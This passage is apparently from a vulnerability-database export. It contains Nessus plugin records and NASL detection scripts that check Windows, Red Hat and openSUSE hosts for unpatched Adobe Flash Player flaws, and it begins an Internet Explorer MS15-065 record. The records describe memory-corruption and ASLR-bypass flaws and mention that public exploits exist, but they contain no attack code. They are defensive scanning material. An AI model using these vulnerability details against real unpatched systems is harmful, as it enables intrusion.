exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS16-050\";\nkbs = make_list(\"3154132\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\nfix = FALSE;\nif(iver =~ \"^(19|20|21)\\.\" && ver_compare(ver:iver, fix:\"21.0.0.197\", strict:FALSE) <= 0)\n fix = \"21.0.0.213\";\nelse if(ver_compare(ver:iver, fix:\"18.0.0.333\", strict:FALSE) <= 0)\n fix = \"18.0.0.343\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS16-050', kb:'3154132', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:07:20", "description": "An update for flash-plugin is now available for Red Hat Enterprise Linux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.616.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to crash, execute arbitrary code, or disclose sensitive information when the victim loaded a page containing the malicious SWF content.\n(CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2016:0610)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7"], "id": "REDHAT-RHSA-2016-0610.NASL", "href": "https://www.tenable.com/plugins/nessus/90490", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0610. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90490);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_xref(name:\"RHSA\", value:\"2016:0610\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2016:0610)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.616.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed\nin the References section, could allow an attacker to create a\nspecially crafted SWF file that would cause flash-plugin to crash,\nexecute arbitrary code, or disclose sensitive information when the\nvictim loaded a page containing the malicious SWF content.\n(CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013,\nCVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\nCVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021,\nCVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\nCVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\nCVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2016:0610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1030\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1032\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1017\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1015\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1012\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1013\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1011\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1019\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1023\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1022\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1021\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1006\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1027\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1025\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1024\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1029\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1028\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1020\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-plugin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0610\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.616-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.616-1.el6_7\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:41:35", "description": "Versions of Adobe Flash Player prior to 11.2.202.616, 18.0.0.343, or 21.0.0.213 are outdated and thus unpatched for the following vulnerabilities :\n\n - A JIT Spraying Attack vulnerability exists that may allow a context-dependent attacker to disable the Address Space Layout Randomization (ASLR) feature, potentially allowing them to more easily conduct more severe attacks. (CVE-2016-1006)\n - A use-after-free error exists, which may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. (CVE-2016-1011)\n - An unspecified flaw exists that is triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2016-1012)\n - An unspecified use-after-free error exists, which may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. (CVE-2016-1013)\n - An unspecified flaw exists in the handling of directory search paths that may allow a context-dependent attacker to gain unauthorized access to potentially sensitive resources. (CVE-2016-1014)\n - A type confusion flaw exists that is triggered when handling AS2 NetConnection objects. This may allow a context-dependent attacker to execute arbitrary code. (CVE-2016-1015)\n - A use-after-free error exists that is triggered when setting a special callback on the 'flash.geom.Matrix object'. This may allow a context-dependent attacker to dereference already freed memory and execute arbitrary code. (CVE-2016-1016)\n - A use-after-free error exists that is triggered during 'LoadVars.decode' handling. This may allow a context-dependent attacker to dereference already freed memory and execute arbitrary code. (CVE-2016-1017)\n - An overflow condition exists that is triggered when handling JPEG-XR compressed image content. The issue lies in the failure to properly check that an index is within the bounds of a buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. (CVE-2016-1018)\n - A type confusion flaw exists in the ASnative API that may allow a context-dependent attacker to potentially execute arbitrary code. Adobe states that this issue is being actively exploited against systems running Windows. Current exploits only target version 20.0.0.306 and earlier due to a mitigation implemented in version 21.0.0.182 and later. (CVE-2016-1019)\n - A number of unspecified flaws exists that are triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n - An unspecified flaw exists that may allow a context-dependent attacker to bypass security features. No further details have been provided by the vendor. (CVE-2016-1030)\n - A use-after-free error exists, which may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. No further details have been provided by the vendor.(CVE-2016-1031)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-20T00:00:00", "type": "nessus", "title": "Flash Player < 11.2.202.616 / 18.0.0.343 / 21.0.0.213 Multiple Vulnerabilities (APSB16-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019", "CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "9276.PRM", "href": "https://www.tenable.com/plugins/nnm/9276", "sourceData": "Binary data 9276.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:25:09", "description": "This security update for flash-player to 11.2.202.621 fixes the following issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. (APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\n\nSome CVEs were not listed in the last submission :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2016-585)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033", "CVE-2016-4117"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-585.NASL", "href": "https://www.tenable.com/plugins/nessus/91178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-585.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91178);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\",\n \"CVE-2016-4117\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-585)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This security update for flash-player to 11.2.202.621 fixes the\nfollowing issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and\nChrome OS. Successful exploitation could cause a crash and potentially\nallow an attacker to take control of the affected system. (APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\n\nSome CVEs were not listed in the last submission :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011,\n CVE-2016-1012, CVE-2016-1013, CVE-2016-1014,\n CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\n CVE-2016-1024, CVE-2016-1025, CVE-2016-1026,\n CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.621-2.97.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.621-2.97.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.621-2.97.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T17:58:28", "description": "The version of Internet Explorer installed on the remote host is missing Cumulative Security Update 3076321. It is, therefore, affected by multiple vulnerabilities, the majority of which are remote code execution vulnerabilities. An attacker can exploit these vulnerabilities by convincing a user to visit a specially crafted website.\n\nHosts running Internet Explorer 10 or Internet Explorer 11 will not be fully protected until both security update 3065822 and security update 3075516 are applied to the system. Security update 3075516 may require manual installation depending on your patching method.\n\nNote that the majority of the vulnerabilities addressed by Cumulative Security Update 3076321 are mitigated by the Enhanced Security Configuration (ESC) mode which is enabled by default on Windows Server 2003, 2008, 2008 R2, 2012, and 2012 R2.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-15T00:00:00", "type": "nessus", "title": "MS15-065: Cumulative Security Update for Internet Explorer (3076321)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1729", "CVE-2015-1733", "CVE-2015-1738", "CVE-2015-1767", "CVE-2015-2372", "CVE-2015-2383", "CVE-2015-2384", "CVE-2015-2385", "CVE-2015-2388", "CVE-2015-2389", "CVE-2015-2390", "CVE-2015-2391", "CVE-2015-2397", "CVE-2015-2398", "CVE-2015-2401", "CVE-2015-2402", "CVE-2015-2403", "CVE-2015-2404", "CVE-2015-2406", "CVE-2015-2408", "CVE-2015-2410", "CVE-2015-2411", "CVE-2015-2412", "CVE-2015-2413", "CVE-2015-2414", "CVE-2015-2419", "CVE-2015-2421", "CVE-2015-2422", 